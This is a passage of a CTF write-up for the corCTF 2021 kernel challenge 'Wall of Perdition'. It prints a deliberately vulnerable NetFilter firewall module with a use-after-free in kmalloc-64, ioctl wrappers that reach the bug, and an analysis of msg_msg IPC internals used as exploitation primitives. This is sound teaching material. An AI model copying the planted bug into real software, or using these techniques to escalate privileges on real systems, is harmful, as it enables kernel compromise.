Wall of Perdition is the second, and harder, part of a two-part series of kernel exploitation challenges designed by FizzBuzz101 and me for corCTF 2021. You can find the writeup for the first part, Fire of Salvation, on his blog. Unfortunately, both challenges remained unsolved during the competition. Wall of Perdition consists of a vulnerable Linux kernel module; the bug is a 0x30-byte Use-After-Free write in kmalloc-64. With this challenge, we present a new approach to turn the Linux kernel’s IPC mechanism, more specifically message operations, into an exploitation toolkit. Let’s get started!
Overview
For this challenge, we decided to write a kernel firewall, based on NetFilter, controllable from user space via ioctl(). A user can add rules, edit rules, delete rules and duplicate rules (from the inbound list to the outbound list and vice versa).
We used the FGKASLR branch of the Linux kernel. Function Granular Kernel Address Space Layout Randomization increases the level of protection offered by KASLR: while KASLR moves the entire kernel text to a random location at boot time, FGKASLR rearranges the kernel code at load time with per-function granularity. This makes code reuse attacks very difficult to accomplish, as knowing the kernel base address (due to an information leak, for example) is no longer sufficient to calculate the address of an arbitrary function.
Supervisor Mode Execution Prevention (SMEP) and Supervisor Mode Access Prevention (SMAP) are enabled, so it is neither possible to execute code in user space from kernel space, nor to access data in lower-privileged rings without going through dedicated functions like copy_from_user() / copy_to_user(), which temporarily permit user-space accesses (on x86-64 via the stac / clac instructions, which toggle the AC flag in RFLAGS rather than touching CR4) before accessing data in user space.
As additional protections, we enabled CONFIG_STATIC_USERMODEHELPER, forcing all usermode helper calls through a single binary, and we set CONFIG_STATIC_USERMODEHELPER_PATH to an empty string. This way it is impossible to overwrite targets like modprobe_path, core_pattern and so on to make the kernel execute an arbitrary binary.
Finally, we decided to use the SLAB allocator instead of SLUB to prevent any attempt at freelist poisoning, an attack that we will discuss in a future article. Freelist randomization was also enabled.
The challenge and kernel configuration can be found here: Wall of
Perdition
A Buggy Linux Kernel Firewall
We decided to release the firewall source code, so players could directly focus
on the exploitation phase. Here is the source code:
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/device.h>
#include <linux/mutex.h>
#include <linux/fs.h>
#include <linux/slab.h>
#include <linux/miscdevice.h>
#include <linux/uaccess.h>
#include <linux/random.h>
#include <crypto/hash.h>
#include <linux/types.h>
#include <linux/netfilter.h>
#include <linux/netfilter_ipv4.h>
#include <linux/net.h>
#include <linux/in.h>
#include <linux/skbuff.h>
#include <linux/ip.h>
#include <linux/inet.h>
#include <linux/tcp.h>
#include <linux/udp.h>
MODULE_AUTHOR("FizzBuzz and D3v17");
#ifdef EASY_MODE
MODULE_DESCRIPTION("Fire of Salvation");
#endif
#ifndef EASY_MODE
MODULE_DESCRIPTION("Wall of Perdition");
#endif
MODULE_LICENSE("GPL");
#define DEVICE_NAME "firewall"
#define CLASS_NAME "firewall"
#define ADD_RULE 0x1337babe
#define DELETE_RULE 0xdeadbabe
#define EDIT_RULE 0x1337beef
#define SHOW_RULE 0xdeadbeef
#define DUP_RULE 0xbaad5aad
#define ERROR -1
#define SUCCESS 0
#define MAX_RULES 0x80
#define INBOUND 0
#define OUTBOUND 1
#define SKIP -1
#ifdef EASY_MODE
#define DESC_MAX 0x800
#endif
typedef struct
{
char iface[16];
char name[16];
char ip[16];
char netmask[16];
uint8_t idx;
uint8_t type;
uint16_t proto;
uint16_t port;
uint8_t action;
#ifdef EASY_MODE
char desc[DESC_MAX];
#endif
} user_rule_t;
typedef struct
{
char iface[16];
char name[16];
uint32_t ip;
uint32_t netmask;
uint16_t proto;
uint16_t port;
uint8_t action;
uint8_t is_duplicated;
#ifdef EASY_MODE
char desc[DESC_MAX];
#endif
} rule_t;
rule_t **firewall_rules_in;
rule_t **firewall_rules_out;
static DEFINE_MUTEX(firewall_lock);
static long firewall_ioctl(struct file *file, unsigned int cmd, unsigned long arg);
static uint32_t firewall_inbound_hook(void *priv, struct sk_buff *skb, const struct nf_hook_state *state);
static uint32_t firewall_outbound_hook(void *priv, struct sk_buff *skb, const struct nf_hook_state *state);
static uint32_t process_rule(struct sk_buff *skb, rule_t *rule, uint8_t type, int i);
static long firewall_add_rule(user_rule_t user_rule, rule_t **firewall_rules, uint8_t idx);
static long firewall_delete_rule(user_rule_t user_rule, rule_t **firewall_rules, uint8_t idx);
static long firewall_edit_rule(user_rule_t user_rule, rule_t **firewall_rules, uint8_t idx);
static long firewall_show_rule(user_rule_t user_rule, rule_t **firewall_rules, uint8_t idx);
static long firewall_dup_rule(user_rule_t user_rule, rule_t **firewall_rules, uint8_t idx);
static struct miscdevice firewall_device;
static struct file_operations firewall_fops = {.unlocked_ioctl = firewall_ioctl};
static struct nf_hook_ops in_hook = {
.hook = firewall_inbound_hook,
.hooknum = NF_INET_PRE_ROUTING,
.pf = PF_INET,
.priority = NF_IP_PRI_FIRST
};
static struct nf_hook_ops out_hook = {
.hook = firewall_outbound_hook,
.hooknum = NF_INET_POST_ROUTING,
.pf = PF_INET,
.priority = NF_IP_PRI_FIRST
};
static long firewall_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
{
int ret;
user_rule_t user_rule;
rule_t **firewall_rules;
mutex_lock(&firewall_lock);
memset(&user_rule, 0, sizeof(user_rule_t));
if (copy_from_user((void *)&user_rule, (void *)arg, sizeof(user_rule_t)))
{
printk(KERN_INFO "[Firewall::Error] firewall_ioctl() cannot copy user request!\n");
mutex_unlock(&firewall_lock);
return ERROR;
}
if (user_rule.idx >= MAX_RULES)
{
printk(KERN_INFO "[Firewall::Info] firewall_ioctl() invalid index!\n");
mutex_unlock(&firewall_lock);
return ERROR;
}
if ((user_rule.type != INBOUND) && (user_rule.type != OUTBOUND))
{
printk(KERN_INFO "[Firewall::Error] firewall_ioctl() invalid rule type!\n");
mutex_unlock(&firewall_lock);
return ERROR;
}
firewall_rules = (user_rule.type == INBOUND) ? firewall_rules_in : firewall_rules_out;
switch (cmd)
{
case ADD_RULE:
ret = firewall_add_rule(user_rule, firewall_rules, user_rule.idx);
break;
case DELETE_RULE:
ret = firewall_delete_rule(user_rule, firewall_rules, user_rule.idx);
break;
case SHOW_RULE:
ret = firewall_show_rule(user_rule, firewall_rules, user_rule.idx);
break;
case EDIT_RULE:
ret = firewall_edit_rule(user_rule, firewall_rules, user_rule.idx);
break;
case DUP_RULE:
ret = firewall_dup_rule(user_rule, firewall_rules, user_rule.idx);
break;
default:
ret = ERROR;
break;
}
mutex_unlock(&firewall_lock);
return ret;
}
static long firewall_add_rule(user_rule_t user_rule, rule_t **firewall_rules, uint8_t idx)
{
printk(KERN_INFO "[Firewall::Info] firewall_add_rule() adding new rule!\n");
if (firewall_rules[idx] != NULL)
{
printk(KERN_INFO "[Firewall::Error] firewall_add_rule() invalid rule slot!\n");
return ERROR;
}
firewall_rules[idx] = (rule_t *)kzalloc(sizeof(rule_t), GFP_KERNEL);
if (!firewall_rules[idx])
{
printk(KERN_INFO "[Firewall::Error] firewall_add_rule() allocation error!\n");
return ERROR;
}
memcpy(firewall_rules[idx]->iface, user_rule.iface, 16);
memcpy(firewall_rules[idx]->name, user_rule.name, 16);
#ifdef EASY_MODE
strncpy(firewall_rules[idx]->desc, user_rule.desc, DESC_MAX);
#endif
if (in4_pton(user_rule.ip, strnlen(user_rule.ip, 16), (u8 *)&(firewall_rules[idx]->ip), -1, NULL) == 0)
{
printk(KERN_ERR "[Firewall::Error] firewall_add_rule() invalid IP format!\n");
kfree(firewall_rules[idx]);
firewall_rules[idx] = NULL;
return ERROR;
}
if (in4_pton(user_rule.netmask, strnlen(user_rule.netmask, 16), (u8 *)&(firewall_rules[idx]->netmask), -1, NULL) == 0)
{
printk(KERN_ERR "[Firewall::Error] firewall_add_rule() invalid Netmask format!\n");
kfree(firewall_rules[idx]);
firewall_rules[idx] = NULL;
return ERROR;
}
firewall_rules[idx]->proto = user_rule.proto;
firewall_rules[idx]->port = ntohs(user_rule.port);
firewall_rules[idx]->action = user_rule.action;
firewall_rules[idx]->is_duplicated = 0;
printk(KERN_ERR "[Firewall::Info] firewall_add_rule() new rule added!\n");
return SUCCESS;
}
static long firewall_delete_rule(user_rule_t user_rule, rule_t **firewall_rules, uint8_t idx)
{
printk(KERN_INFO "[Firewall::Info] firewall_delete_rule() deleting rule!\n");
if (firewall_rules[idx] == NULL)
{
printk(KERN_INFO "[Firewall::Error] firewall_delete_rule() invalid rule slot!\n");
return ERROR;
}
kfree(firewall_rules[idx]); // [3]
firewall_rules[idx] = NULL;
return SUCCESS;
}
static long firewall_edit_rule(user_rule_t user_rule, rule_t **firewall_rules, uint8_t idx)
{
printk(KERN_INFO "[Firewall::Info] firewall_edit_rule() editing rule!\n");
#ifdef EASY_MODE
printk(KERN_INFO "[Firewall::Error] Note that description editing is not implemented.\n");
#endif
if (firewall_rules[idx] == NULL)
{
printk(KERN_INFO "[Firewall::Error] firewall_edit_rule() invalid idx!\n");
return ERROR;
}
memcpy(firewall_rules[idx]->iface, user_rule.iface, 16);
memcpy(firewall_rules[idx]->name, user_rule.name, 16);
if (in4_pton(user_rule.ip, strnlen(user_rule.ip, 16), (u8 *)&(firewall_rules[idx]->ip), -1, NULL) == 0)
{
printk(KERN_ERR "[Firewall::Error] firewall_edit_rule() invalid IP format!\n");
return ERROR;
}
if (in4_pton(user_rule.netmask, strnlen(user_rule.netmask, 16), (u8 *)&(firewall_rules[idx]->netmask), -1, NULL) == 0)
{
printk(KERN_ERR "[Firewall::Error] firewall_edit_rule() invalid Netmask format!\n");
return ERROR;
}
firewall_rules[idx]->proto = user_rule.proto;
firewall_rules[idx]->port = ntohs(user_rule.port);
firewall_rules[idx]->action = user_rule.action;
printk(KERN_ERR "[Firewall::Info] firewall_edit_rule() rule edited!\n");
return SUCCESS;
}
static long firewall_show_rule(user_rule_t user_rule, rule_t **firewall_rules, uint8_t idx)
{
printk(KERN_INFO "[Firewall::Error] Function not implemented.\n");
return ERROR;
}
static long firewall_dup_rule(user_rule_t user_rule, rule_t **firewall_rules, uint8_t idx)
{
uint8_t i;
rule_t **dup;
printk(KERN_INFO "[Firewall::Info] firewall_dup_rule() duplicating rule!\n");
dup = (user_rule.type == INBOUND) ? firewall_rules_out : firewall_rules_in;
if (firewall_rules[idx] == NULL)
{
printk(KERN_INFO "[Firewall::Error] firewall_dup_rule() nothing to duplicate!\n");
return ERROR;
}
if (firewall_rules[idx]->is_duplicated)
{
printk(KERN_INFO "[Firewall::Info] firewall_dup_rule() rule already duplicated before!\n");
return ERROR;
}
for (i = 0; i < MAX_RULES; i++)
{
if (dup[i] == NULL)
{
dup[i] = firewall_rules[idx];
firewall_rules[idx]->is_duplicated = 1;
printk(KERN_INFO "[Firewall::Info] firewall_dup_rule() rule duplicated!\n");
return SUCCESS;
}
}
printk(KERN_INFO "[Firewall::Error] firewall_dup_rule() nowhere to duplicate!\n");
return ERROR;
}
static uint32_t process_rule(struct sk_buff *skb, rule_t *rule, uint8_t type, int i)
{
struct iphdr *iph;
struct tcphdr *tcph;
struct udphdr *udph;
printk(KERN_INFO "[Firewall::Info] rule->iface: %s...\n", rule->iface);
printk(KERN_INFO "[Firewall::Info] skb->dev->name: %s...\n", skb->dev->name);
if (strncmp(rule->iface, skb->dev->name, 16) != 0)
{
printk(KERN_INFO "[Firewall::Error] Rule[%d], interface doesn't match, skipping!\n", i);
return SKIP;
}
iph = ip_hdr(skb);
if (type == INBOUND)
{
if ((rule->ip & rule->netmask) != (iph->saddr & rule->netmask))
{
printk(KERN_INFO "[Firewall::Error] Rule[%d], ip->saddr doesn't belong to the provided subnet, skipping!\n", i);
return SKIP;
}
}
else
{
if ((rule->ip & rule->netmask) != (iph->daddr & rule->netmask))
{
printk(KERN_INFO "[Firewall::Error] Rule[%d], ip->daddr doesn't belong to the provided subnet, skipping!\n", i);
return SKIP;
}
}
if ((rule->proto == IPPROTO_TCP) && (iph->protocol == IPPROTO_TCP))
{
printk(KERN_INFO "[Firewall::Info] Rule[%d], protocol is TCP\n", i);
tcph = tcp_hdr(skb);
if ((rule->port != 0) && (rule->port != tcph->dest))
{
printk(KERN_INFO "[Firewall::Error] Rule[%d], rule->port (%d) != tcph->dest (%d), skipping!\n", i, ntohs(rule->port), ntohs(tcph->dest));
return SKIP;
}
if ((rule->action != NF_DROP) && (rule->action != NF_ACCEPT))
{
printk(KERN_INFO "[Firewall::Error] Rule[%d], invalid action (%d), skipping!\n", i, rule->action);
return SKIP;
}
printk(KERN_INFO "[Firewall::Info] %s Rule[%d], action %d\n", (type == INBOUND) ? "Inbound" : "Outbound", i, rule->action);
return rule->action;
}
else if ((rule->proto == IPPROTO_UDP) && (iph->protocol == IPPROTO_UDP))
{
printk(KERN_INFO "[Firewall::Info] Rule[%d], protocol is UDP\n", i);
udph = udp_hdr(skb);
if ((rule->port != 0) && (rule->port != udph->dest))
{
printk(KERN_INFO "[Firewall::Error] Rule[%d], rule->port (%d) != udph->dest (%d), skipping!\n", i, ntohs(rule->port), ntohs(udph->dest));
return SKIP;
}
if ((rule->action != NF_DROP) && (rule->action != NF_ACCEPT))
{
printk(KERN_INFO "[Firewall::Error] Rule[%d], invalid action (%d), skipping!\n", i, rule->action);
return SKIP;
}
printk(KERN_INFO "[Firewall::Info] %s Rule[%d], action %d\n", (type == INBOUND) ? "Inbound" : "Outbound", i, rule->action);
return rule->action;
}
return SKIP;
}
static uint32_t firewall_inbound_hook(void *priv, struct sk_buff *skb, const struct nf_hook_state *state)
{
int i;
uint32_t ret;
for (i = 0; i < MAX_RULES; i++)
{
if (firewall_rules_in[i])
{
ret = process_rule(skb, firewall_rules_in[i], INBOUND, i);
if (ret != SKIP)
return ret;
}
}
return NF_ACCEPT;
}
static uint32_t firewall_outbound_hook(void *priv, struct sk_buff *skb, const struct nf_hook_state *state)
{
int i;
uint32_t ret;
for (i = 0; i < MAX_RULES; i++)
{
if (firewall_rules_out[i])
{
ret = process_rule(skb, firewall_rules_out[i], OUTBOUND, i);
if (ret != SKIP)
return ret;
}
}
return NF_ACCEPT;
}
static int init_firewall(void)
{
mutex_init(&firewall_lock);
firewall_device.minor = MISC_DYNAMIC_MINOR;
firewall_device.name = DEVICE_NAME;
firewall_device.fops = &firewall_fops;
if (misc_register(&firewall_device))
{
printk(KERN_INFO "[Firewall::Error] Device registration failed!\n");
return ERROR;
}
printk(KERN_INFO "[Firewall::Init] Initializing firewall...\n");
firewall_rules_in = kzalloc(sizeof(void *) * MAX_RULES, GFP_KERNEL);
firewall_rules_out = kzalloc(sizeof(void *) * MAX_RULES, GFP_KERNEL);
if (nf_register_net_hook(&init_net, &in_hook) < 0)
{
printk(KERN_INFO "[Firewall::Error] Cannot register nf hook!\n");
return ERROR;
}
if (nf_register_net_hook(&init_net, &out_hook) < 0)
{
printk(KERN_INFO "[Firewall::Error] Cannot register nf hook!\n");
return ERROR;
}
printk(KERN_INFO "[Firewall::Init] Firewall initialized!\n");
#ifdef EASY_MODE
printk(KERN_INFO "[Firewall::Init] 👼 Welcome to Easy Mode 👼\n");
#else
printk(KERN_INFO "[Firewall::Init] 😈 Welcome to Hard Mode 😈\n");
#endif
return SUCCESS;
}
static void cleanup_firewall(void)
{
int i;
printk(KERN_INFO "[Firewall::Exit] Cleaning up...\n");
for (i = 0; i < MAX_RULES; i++)
{
if (firewall_rules_in[i] != NULL)
{
kfree(firewall_rules_in[i]);
}
if (firewall_rules_out[i] != NULL)
{
kfree(firewall_rules_out[i]);
}
}
memset(firewall_rules_in, 0, sizeof(void *) * MAX_RULES);
memset(firewall_rules_out, 0, sizeof(void *) * MAX_RULES);
kfree(firewall_rules_in);
firewall_rules_in = NULL;
kfree(firewall_rules_out);
firewall_rules_out = NULL;
nf_unregister_net_hook(&init_net, &in_hook);
nf_unregister_net_hook(&init_net, &out_hook);
misc_deregister(&firewall_device);
mutex_destroy(&firewall_lock);
printk(KERN_INFO "[Firewall::Exit] Cleanup done, bye!\n");
}
module_init(init_firewall);
module_exit(cleanup_firewall);
As we mentioned in the introduction, a user can interact with the firewall using ioctl(). There are five exposed functions: add_rule() (line 184), delete_rule() (line 236), edit_rule() (line 253), show_rule() (line 292) and duplicate_rule() (line 299). As we can see from the source code, show_rule(), despite being exposed, is not implemented.
The firewall is based on NetFilter and uses two NetFilter hooks: a prerouting hook to filter incoming packets (line 104) and a postrouting hook to filter outgoing packets (line 111). For this reason, the source code contains two lists of pointers to rules, firewall_rules_in (line 86) and firewall_rules_out (line 87). Each list can contain up to 128 pointers to rules.
The request format used to interact with the firewall is defined by the type user_rule_t (line 69). The IP address and netmask are sent to the kernel in character buffers and are subsequently converted to integers in kernel space, as we can see in add_rule() (lines 209, 217) and edit_rule() (lines 270, 276). Other required fields include the interface name, rule name, rule index, port, type (0 for inbound, 1 for outbound), protocol, and the action to be taken when there is a match in process_rule().
Once IP and netmask have been converted to integers, the user request is transferred into a new structure handled by the kernel, defined by the type rule_t (line 84). This structure is allocated in kmalloc-64, since its size is 0x30 bytes.
Because the exploitation phase is relatively complex, we decided to make the bug very easy to spot. duplicate_rule() allows users to duplicate rules from the firewall_rules_in list to the firewall_rules_out list and vice versa. The problem arises if we duplicate a rule and then free it using delete_rule(). At line 246, delete_rule() uses kfree() to free the rule pointer and then sets it to NULL, but the same pointer remains accessible in the other list. This leads to a 0x30-byte Use-After-Free write in kmalloc-64, using edit_rule() to modify the freed, but still accessible, rule.
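Throughout the writeup we will drive the module through small ioctl() wrappers (add_rule(), delete_rule(), duplicate_rule(), edit_rule()). They are not part of the released source, so here is a minimal sketch of what we are assuming: it mirrors user_rule_t from the module (hard mode, no desc field) and supposes the misc device is exposed as /dev/firewall. The real exploit’s versions differ slightly (its edit_rule(), for instance, takes an extra flag).

#include <stdint.h>
#include <string.h>
#include <fcntl.h>
#include <sys/ioctl.h>

#define ADD_RULE    0x1337babe
#define DELETE_RULE 0xdeadbabe
#define EDIT_RULE   0x1337beef
#define DUP_RULE    0xbaad5aad
#define INBOUND     0
#define OUTBOUND    1

typedef struct
{
    char iface[16];
    char name[16];
    char ip[16];
    char netmask[16];
    uint8_t idx;
    uint8_t type;
    uint16_t proto;
    uint16_t port;
    uint8_t action;
} user_rule_t;

int fw_fd; /* fw_fd = open("/dev/firewall", O_RDONLY); */

long add_rule(uint8_t idx, unsigned char *buff, uint8_t type)
{
    user_rule_t rule = {0};
    memcpy(rule.iface, buff, 16);          /* attacker-controlled bytes */
    memcpy(rule.name, buff + 16, 16);
    strcpy(rule.ip, "127.0.0.1");          /* must satisfy in4_pton()   */
    strcpy(rule.netmask, "255.255.255.0");
    rule.idx = idx;
    rule.type = type;
    return ioctl(fw_fd, ADD_RULE, &rule);
}

long delete_rule(uint8_t idx, uint8_t type)
{
    user_rule_t rule = { .idx = idx, .type = type };
    return ioctl(fw_fd, DELETE_RULE, &rule);
}

long duplicate_rule(uint8_t idx, uint8_t type)
{
    /* firewall_dup_rule() copies the rule pointer into the other list */
    user_rule_t rule = { .idx = idx, .type = type };
    return ioctl(fw_fd, DUP_RULE, &rule);
}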
A Dive Into Linux Kernel’s IPC
To exploit the UAF in kmalloc-64, we are going to abuse the Linux kernel’s IPC mechanism, more specifically message operations. The kernel offers two syscalls to perform Inter Process Communication using messages, msgsnd() and msgrcv(), used respectively to send messages to, and receive messages from, a message queue. A message in kernel space is composed of two parts: a message header, described by the structure msg_msg, and the message data, which follows immediately afterwards. Here is the msg_msg structure:
struct msg_msg {
struct list_head m_list;
long m_type;
size_t m_ts; /* message text size */
struct msg_msgseg *next;
void *security;
/* the actual message follows immediately */
};
This elastic object is extensively used by kernel exploit developers to perform heap sprays. The size of the message can be controlled by the user, so it can be allocated in multiple caches, from kmalloc-64 up to kmalloc-4k.
Every time msgsnd() is used to send a message, the kernel calls do_msgsnd(), which calls load_msg(), which in turn calls alloc_msg() to allocate the objects required to hold the message header and the message data. The message content is subsequently copied from user space to kernel space in load_msg().
For example, let’s say we want to send a message consisting of 0x1fc8 ‘A’s: we first create a message queue using msgget(), then we send the actual message using msgsnd():
[...]
struct msgbuf
{
long mtype;
char mtext[0x1fc8];
} msg;
msg.mtype = 1;
memset(msg.mtext, 'A', sizeof(msg.mtext));
qid = msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
msgsnd(qid, &msg, sizeof(msg.mtext), 0);
[...]
Now let’s examine the source code of alloc_msg()
and
load_msg()
to understand what happens in kernel space:
static struct msg_msg *alloc_msg(size_t len)
{
struct msg_msg *msg;
struct msg_msgseg **pseg;
size_t alen;
alen = min(len, DATALEN_MSG); // [1]
msg = kmalloc(sizeof(*msg) + alen, GFP_KERNEL_ACCOUNT); // [2]
if (msg == NULL)
return NULL;
msg->next = NULL;
msg->security = NULL;
len -= alen; // [3]
pseg = &msg->next;
while (len > 0) {
struct msg_msgseg *seg;
cond_resched();
alen = min(len, DATALEN_SEG); // [4]
seg = kmalloc(sizeof(*seg) + alen, GFP_KERNEL_ACCOUNT); // [5]
if (seg == NULL)
goto out_err;
*pseg = seg; // [6]
seg->next = NULL;
pseg = &seg->next;
len -= alen;
}
return msg;
out_err:
free_msg(msg);
return NULL;
}
As we can see in the source code above, in alloc_msg() the kernel calculates alen = min(len, DATALEN_MSG); [1], where len is the message size provided by the user, 0x1fc8 in our case, and DATALEN_MSG corresponds to ((size_t)PAGE_SIZE - sizeof(struct msg_msg)). By default PAGE_SIZE is equal to 0x1000 bytes and sizeof(struct msg_msg) is equal to 0x30 bytes, therefore DATALEN_MSG corresponds to 0xfd0 bytes, and that line, in our case, results in alen = min(0x1fc8, 0xfd0) = 0xfd0.
At the next line, the kernel allocates the message using msg = kmalloc(sizeof(*msg) + alen, GFP_KERNEL_ACCOUNT); [2]. Here sizeof(*msg) is equal to 0x30 bytes (the message header size) and alen, as discussed above, is equal to 0xfd0. That line, in our case, is equivalent to msg = kmalloc(0x1000, GFP_KERNEL_ACCOUNT);: this message will be allocated in kmalloc-4k.
A few lines later, len, the message size provided by the user, is decremented by alen [3], then the kernel starts allocating the segments needed to store the remaining data, until len reaches zero. Segments are connected in a singly linked list. The size of a segment is calculated by alen = min(len, DATALEN_SEG); [4], basically min(remaining size, DATALEN_SEG). In our case, len was decremented by alen, so it corresponds to len = len - alen = 0x1fc8 - 0xfd0 = 0xff8. DATALEN_SEG is defined as ((size_t)PAGE_SIZE - sizeof(struct msg_msgseg)), and since sizeof(struct msg_msgseg) is equal to 0x8 bytes, DATALEN_SEG corresponds to 0xff8 bytes. That line results in alen = min(0xff8, 0xff8) = 0xff8;. At the next line, the segment is allocated using seg = kmalloc(sizeof(*seg) + alen, GFP_KERNEL_ACCOUNT); [5]. Since sizeof(*seg) is equal to 0x8 bytes and alen is now 0xff8, that line is equivalent to seg = kmalloc(0x1000, GFP_KERNEL_ACCOUNT);. This segment, too, will be allocated in kmalloc-4k. Finally, the segment pointer is saved in the message header [6], and the function can return the pointer to the message.
At this point
load_msg()
is ready to copy the message content from user space to kernel space:
struct msg_msg *load_msg(const void __user *src, size_t len)
{
struct msg_msg *msg;
struct msg_msgseg *seg;
int err = -EFAULT;
size_t alen;
msg = alloc_msg(len); // [1]
if (msg == NULL)
return ERR_PTR(-ENOMEM);
alen = min(len, DATALEN_MSG);
if (copy_from_user(msg + 1, src, alen)) // [2]
goto out_err;
for (seg = msg->next; seg != NULL; seg = seg->next) {
len -= alen;
src = (char __user *)src + alen;
alen = min(len, DATALEN_SEG);
if (copy_from_user(seg + 1, src, alen)) // [3]
goto out_err;
}
err = security_msg_msg_alloc(msg);
if (err)
goto out_err;
return msg;
out_err:
free_msg(msg);
return ERR_PTR(err);
}
As we can see from the load_msg() source code, after allocating the message using alloc_msg() [1], it copies the message data from user space to the allocated memory region in kernel space [2]. Then it copies the remaining data into the segments [3]. In our case it copies the first 0xfd0 bytes into the message itself, and the remaining 0xff8 bytes into the segment. Of course, in our case we only have a single segment, so its pointer to the next segment will be NULL.
Here is our message in kernel memory:
And here is the corresponding segment:
Now let’s see what happens when we use msgrcv()
to receive the
message:
void *memdump = malloc(0x1fc8);
msgrcv(qid, memdump, 0x1fc8, 1, IPC_NOWAIT | MSG_NOERROR);
First, the kernel calls
do_msgrcv(),
setting its sixth argument, the msg_handler()
function pointer, to
do_msg_fill()
as we can see in
ksys_msgrcv():
long ksys_msgrcv(int msqid, struct msgbuf __user *msgp, size_t msgsz,
long msgtyp, int msgflg)
{
return do_msgrcv(msqid, msgp, msgsz, msgtyp, msgflg, do_msg_fill);
}
Later on, do_msg_fill()
will be used to copy the message from
kernel space to user space. Here is the source code of do_msgrcv()
:
static long do_msgrcv(int msqid, void __user *buf, size_t bufsz, long msgtyp, int msgflg,
long (*msg_handler)(void __user *, struct msg_msg *, size_t))
{
int mode;
struct msg_queue *msq;
struct ipc_namespace *ns;
struct msg_msg *msg, *copy = NULL;
DEFINE_WAKE_Q(wake_q);
ns = current->nsproxy->ipc_ns;
if (msqid < 0 || (long) bufsz < 0)
return -EINVAL;
if (msgflg & MSG_COPY) {
if ((msgflg & MSG_EXCEPT) || !(msgflg & IPC_NOWAIT))
return -EINVAL;
copy = prepare_copy(buf, min_t(size_t, bufsz, ns->msg_ctlmax)); // [4]
if (IS_ERR(copy))
return PTR_ERR(copy);
}
mode = convert_mode(&msgtyp, msgflg);
rcu_read_lock();
msq = msq_obtain_object_check(ns, msqid);
if (IS_ERR(msq)) {
rcu_read_unlock();
free_copy(copy);
return PTR_ERR(msq);
}
for (;;) {
struct msg_receiver msr_d;
msg = ERR_PTR(-EACCES);
if (ipcperms(ns, &msq->q_perm, S_IRUGO))
goto out_unlock1;
ipc_lock_object(&msq->q_perm);
/* raced with RMID? */
if (!ipc_valid_object(&msq->q_perm)) {
msg = ERR_PTR(-EIDRM);
goto out_unlock0;
}
msg = find_msg(msq, &msgtyp, mode); // [1]
if (!IS_ERR(msg)) {
/*
* Found a suitable message.
* Unlink it from the queue.
*/
if ((bufsz < msg->m_ts) && !(msgflg & MSG_NOERROR)) {
msg = ERR_PTR(-E2BIG);
goto out_unlock0;
}
/*
* If we are copying, then do not unlink message and do
* not update queue parameters.
*/
if (msgflg & MSG_COPY) {
msg = copy_msg(msg, copy); // [5]
goto out_unlock0;
}
list_del(&msg->m_list);
msq->q_qnum--;
msq->q_rtime = ktime_get_real_seconds();
ipc_update_pid(&msq->q_lrpid, task_tgid(current));
msq->q_cbytes -= msg->m_ts;
atomic_sub(msg->m_ts, &ns->msg_bytes);
atomic_dec(&ns->msg_hdrs);
ss_wakeup(msq, &wake_q, false);
goto out_unlock0;
}
/* No message waiting. Wait for a message */
if (msgflg & IPC_NOWAIT) {
msg = ERR_PTR(-ENOMSG);
goto out_unlock0;
}
list_add_tail(&msr_d.r_list, &msq->q_receivers);
msr_d.r_tsk = current;
msr_d.r_msgtype = msgtyp;
msr_d.r_mode = mode;
if (msgflg & MSG_NOERROR)
msr_d.r_maxsize = INT_MAX;
else
msr_d.r_maxsize = bufsz;
/* memory barrier not require due to ipc_lock_object() */
WRITE_ONCE(msr_d.r_msg, ERR_PTR(-EAGAIN));
/* memory barrier not required, we own ipc_lock_object() */
__set_current_state(TASK_INTERRUPTIBLE);
ipc_unlock_object(&msq->q_perm);
rcu_read_unlock();
schedule();
/*
* Lockless receive, part 1:
* We don't hold a reference to the queue and getting a
* reference would defeat the idea of a lockless operation,
* thus the code relies on rcu to guarantee the existence of
* msq:
* Prior to destruction, expunge_all(-EIRDM) changes r_msg.
* Thus if r_msg is -EAGAIN, then the queue not yet destroyed.
*/
rcu_read_lock();
/*
* Lockless receive, part 2:
* The work in pipelined_send() and expunge_all():
* - Set pointer to message
* - Queue the receiver task for later wakeup
* - Wake up the process after the lock is dropped.
*
* Should the process wake up before this wakeup (due to a
* signal) it will either see the message and continue ...
*/
msg = READ_ONCE(msr_d.r_msg);
if (msg != ERR_PTR(-EAGAIN)) {
/* see MSG_BARRIER for purpose/pairing */
smp_acquire__after_ctrl_dep();
goto out_unlock1;
}
/*
* ... or see -EAGAIN, acquire the lock to check the message
* again.
*/
ipc_lock_object(&msq->q_perm);
msg = READ_ONCE(msr_d.r_msg);
if (msg != ERR_PTR(-EAGAIN))
goto out_unlock0;
list_del(&msr_d.r_list);
if (signal_pending(current)) {
msg = ERR_PTR(-ERESTARTNOHAND);
goto out_unlock0;
}
ipc_unlock_object(&msq->q_perm);
}
out_unlock0:
ipc_unlock_object(&msq->q_perm);
wake_up_q(&wake_q);
out_unlock1:
rcu_read_unlock();
if (IS_ERR(msg)) {
free_copy(copy);
return PTR_ERR(msg);
}
bufsz = msg_handler(buf, msg, bufsz); // [2]
free_msg(msg); // [3]
return bufsz;
}
As we can see, in do_msgrcv() the kernel uses find_msg() to locate the correct message [1]. Then, on success, after performing some checks and unlinking the requested message from the message queue, it calls msg_handler(), previously set to do_msg_fill(), to copy the message from kernel space to user space [2]:
static long do_msg_fill(void __user *dest, struct msg_msg *msg, size_t bufsz)
{
struct msgbuf __user *msgp = dest;
size_t msgsz;
if (put_user(msg->m_type, &msgp->mtype))
return -EFAULT;
msgsz = (bufsz > msg->m_ts) ? msg->m_ts : bufsz; // [2.1]
if (store_msg(msgp->mtext, msg, msgsz)) // [2.2]
return -EFAULT;
return msgsz;
}
do_msg_fill() checks whether the requested message size is greater than the size saved in msg->m_ts [2.1]. If the requested size exceeds the size saved in the message header, it will only copy m_ts bytes; otherwise it will use the size provided by the user. This check is necessary to avoid an Out Of Bounds Read when the user calls msgrcv(). In our case, msgsz will be equal to 0x1fc8 bytes.
Finally,
store_msg()
is called [2.2]. It copies msgsz
bytes (0x1fc8 in our case) from kernel space to the buffer provided by
the user:
int store_msg(void __user *dest, struct msg_msg *msg, size_t len)
{
size_t alen;
struct msg_msgseg *seg;
alen = min(len, DATALEN_MSG); // [2.2.1]
if (copy_to_user(dest, msg + 1, alen)) // [2.2.2]
return -1;
for (seg = msg->next; seg != NULL; seg = seg->next) { // [2.2.3]
len -= alen;
dest = (char __user *)dest + alen;
alen = min(len, DATALEN_SEG); // [2.2.4]
